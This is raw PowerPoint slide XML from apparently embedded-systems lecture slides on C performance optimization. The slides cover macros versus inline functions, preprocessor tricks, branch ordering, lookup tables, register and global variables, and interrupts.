            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>Using immediate data can result in 48-bit or 64-bit instructions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>36 core registers (can be increased or decreased)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>5 stage pipeline</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41599624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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685800" y="2130425"/>
            <a:ext cx="7772400" cy="1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Optimizations</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="320626504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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Optimizing for performance</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="214696331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normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Use “#define” / “inline” instead of Functions (I)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5123" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2362200"/>
            <a:ext cx="3124200" cy="835025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>define</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> F(X) (X)+=1; \    	(X) = (X/2)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5124" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="2362200"/>
            <a:ext cx="31242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inline</a:t>
            </a:r>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x) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	x +=1;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	x = x/2;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	return x;</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03856989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#define is flexible</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6147" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="838200" y="2057400"/>
            <a:ext cx="7696200" cy="452437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offsetof(s,m) (size_t)&amp;(((s *)0)-&gt;m)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRP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MYCASE(item,id)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id: \ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	item##_##id = id;\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break </a:t>
            </a:r>
          </a:p>
          <a:p>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(x) </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MYCASE(widget,23); </a:t>
            </a:r>
          </a:p>
          <a:p>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QUOTEME(x) #x </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>printf("%s\n", QUOTEME(1+2));</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dumpme(x, fmt) printf("%s:%u: %s=" fmt, __FILE__, __LINE__, #x, x)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dumpme(foo, "%d");</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="357804113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pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Simple Branch Optimization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="376835" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1371600"/>
            <a:ext cx="8229600" cy="685800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Q: Which is more efficient?</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76838" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="3810000"/>
            <a:ext cx="8229600" cy="28194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endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7173" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="914400" y="2133600"/>
            <a:ext cx="31242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(x==1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	f();</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else</a:t>
            </a:r>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(x==2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	g();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7174" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4495800" y="2133600"/>
            <a:ext cx="3124200" cy="132397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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (x==2) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	g();</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else</a:t>
            </a:r>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if</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (x==1) {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	f();</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8333417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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4000" smtClean="0"/>
              <a:t>Lookup Tables instead of Switch Blocks</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="377859" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Q: Which is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>more efficient?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>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77862" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="457200" y="5410200"/>
            <a:ext cx="8229600" cy="12192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endParaRPr lang="en-US" sz="2800" dirty="0">
              <a:effectLst>
                <a:outerShdw blurRad="38100" dist="38100" dir="2700000" algn="tl">
                  <a:srgbClr val="000000"/>
                </a:outerShdw>
              </a:effectLst>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8197" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="2667000"/>
            <a:ext cx="3124200" cy="2057400"/>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switch</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (x) {</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1:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		f();</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2:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		g();</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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		h();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8198" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4267200" y="2667000"/>
            <a:ext cx="44196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func_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[])() = {f, g, h};</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>func_arr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[x]();</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="365702433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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>C to Assembly – Do it Yourself</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="378883" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="2119313"/>
            <a:ext cx="8229600" cy="3463925"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Translation from C to Assembly done by compiler.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Compiler might not always do the most efficient job.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>You can write some instructions in Assembly and instruct the Linker to combine them in appropriate locations.</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2233095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eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Register Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="379907" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1752600"/>
            <a:ext cx="8229600" cy="4495800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Reminder: Processors do not use variables directly from memory.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For a processor to read a variable, it must first load it from memory (using a relatively costly instruction) to its registers.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>For commonly accessed variables – why keep loading them from memory over and over again?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>More efficient to keep them in some register for longer</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“register” keyword – can be used for local variables, to hint the compiler about such commonly used variables.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" smtClean="0"/>
              <a:t>But some compilers may ignore this keyword.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="168006455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en-US" smtClean="0"/>
              <a:t>Global Variables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="380931" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Leads to less modular functions and more spaghetti logic, however:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0"/>
              <a:t>Saves push and pop operations on the stack frame.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="64026530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body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1143000"/>
            <a:ext cx="8305800" cy="4724400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Interrupts are usually considered more efficient.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>But that’s not always the case…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Interrupts have an overhead of context switching.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Q: So which is more efficient in both cases below?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
